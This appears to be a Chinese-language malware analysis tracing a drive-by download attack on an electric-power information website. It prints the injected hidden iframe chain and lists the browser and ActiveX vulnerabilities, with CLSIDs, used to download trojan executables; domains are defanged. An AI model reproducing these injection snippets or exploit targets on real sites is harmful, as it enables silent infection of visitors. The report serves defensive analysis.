某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel

网页包含代码：

/---

＜iframe src=hxxp://c**5.*5*i***6.us/c5.htm?8888 width=0 h'＞

＜iframe src="hxxp://125.*64.*92.*56/iisstart.htm" width="100" height="0"＞＜/iframe＞

---/

#1 hxxp://c**5.*5*i***6.us/c5.htm?8888内容为：

/---

＜iframe src=hxxp://www.*36**0c*36*0.***.cn/100.htm width=0 height=0＞＜/iframe＞

---/

#1.1 hxxp://www.*36**0c*36*0.***.cn/100.htm 包含代码：

/---

＜iframe style=display:none src="hxxp://www.*36**0a*36*0.***.cn/w/u.html"＞＜/iframe＞

---/

#1.1.1 hxxp://www.*36**0a*36*0.***.cn/w/u.html 输出代码：

/---

＜script src=1.gif＞＜/script＞

＜iframe width=100 height=0 src=6.gif＞＜/iframe＞

＜iframe width=100 height=0 src=5.gif＞＜/iframe＞

＜iframe width=100 height=0 src=3.gif＞＜/iframe＞

＜iframe width=100 height=0 src=2.gif＞＜/iframe＞

＜iframe width=100 height=0 src=7.gif＞＜/iframe＞

＜iframe width=100 height=0 src=4.gif＞＜/iframe＞

---/

#1.1.1.1 hxxp://www.*36**0a*36*0.***.cn/w/1.gif

利用MS06-014漏洞下载 hxxp://www.*36**0a*36*0.***.cn/d/614.exe

#1.1.1.2 hxxp://www.*36**0a*36*0.***.cn/w/2.gif

利用RealPlayer（IERPCtl.IERPCtl.1）漏洞 下载 hxxp://www.*36**0a*36*0.***.cn/d/r11.exe

r11.exe 同 614.exe

#1.1.1.3 hxxp://www.*36**0a*36*0.***.cn/w/3.gif

利用暴风影音（MPS.StormPlayer.1）漏洞下载 hxxp://www.*36**0a*36*0.***.cn/d/bf.exe，

bf.exe 同 614.exe

#1.1.1.4 hxxp://www.*36**0a*36*0.***.cn/w/4.gif

利用PPStream（POWERPLAYER.PowerPlayerCtrl.1，clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458）漏洞下载 hxxp://www.*36**0a*36*0.***.cn/d/pps.exe

pps.exe 同 614.exe

#1.1.1.5 hxxp://www.*36**0a*36*0.***.cn/w/5.gif

利用联众（GLCHAT.GLChatCtrl.1，clsid:61F5C358-60FB-4A23-A312-D2B556620F20）漏洞下载 hxxp://www.*36**0a*36*0.***.cn/d/lz.exe

lz.exe 同 614.exe

#1.1.1.6 hxxp://www.*36**0a*36*0.***.cn/w/6.gif

利用迅雷（DPClient.Vod，clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F）漏洞下载 hxxp://www.*36**0a*36*0.***.cn/d/xl.exe

xl.exe 同 614.exe

#1.1.1.7 hxxp://www.*36**0a*36*0.***.cn/w/7.gif

利用RealPlayer（IERPCtl.IERPCtl.1，clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93）漏洞 下载 hxxp://www.*36**0a*36*0.***.cn/d/r11.exe

r11.exe 同 614.exe

#1.1.1.8 利用 BaiduBar.Tool 下载 hxxp://www.*36**0a*36*0.***.cn/d/ad.cab，内含 ad.exe 同 614.exe

#2 hxxp://125.*64.*92.*56/iisstart.htm 包含代码：

/---

＜iframe src="hxxp://d***.so**r**ryl*.biz/xx/am1.htm?12-8888" width="100" height="0"＞＜/iframe＞

---/

#2.1 hxxp://d***.so**r**ryl*.biz/xx/am1.htm?12-8888 包含/输出代码：

/---

＜iframe src="hxxp://d***.so**r**ryl*.biz/ax14.htm" width=100 height=0＞＜/iframe＞

＜iframe src="hxxp://d***.so**r**ryl*.biz/re10.htm" width=100 height=0＞＜/iframe＞

＜iframe src="hxxp://www.to**ngji**12**3.org/axfs.htm" width=100 height=0＞＜/iframe＞

＜iframe style=display:none src="hxxp://d***.so**r**ryl*.biz/axlz.htm"＞＜/iframe＞

＜iframe style=display:none src="hxxp://d***.so**r**ryl*.biz/re11.htm"＞＜/iframe＞

---/

#2.1.1 hxxp://d***.so**r**ryl*.biz/ax14.htm

利用 MS06-014 漏洞下载 hxxp://www.to**ngji**12**3.org/soc.exe

#2.1.2 hxxp://d***.so**r**ryl*.biz/re10.htm

利用 RealPlayer 漏洞下载 hxxp://www.to**ngji**12**3.org/soc.exe

#2.1.3 hxxp://www.to**ngji**12**3.org/axfs.htm

/---

文件不存在

---/

#2.1.4 hxxp://d***.so**r**ryl*.biz/axlz.htm

利用 联众世界（GLIEDown.IEDown.1，clsid:F917534D-535B-416B-8E8F-0C04756C31A8）漏洞下载 hxxp://www.to**ngji**12**3.org/soc.exe

#2.1.5 hxxp://d***.so**r**ryl*.biz/re11.htm

利用 RealPlayer（IERPCtl.IERPCtl.1，clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93）漏洞下载 hxxp://www.to**ngji**12**3.org/soc.exe